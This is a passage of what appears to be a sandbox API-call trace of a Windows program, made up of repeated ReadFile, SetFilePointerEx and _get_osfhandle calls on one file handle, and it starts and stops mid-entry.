lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.286] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.287] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, 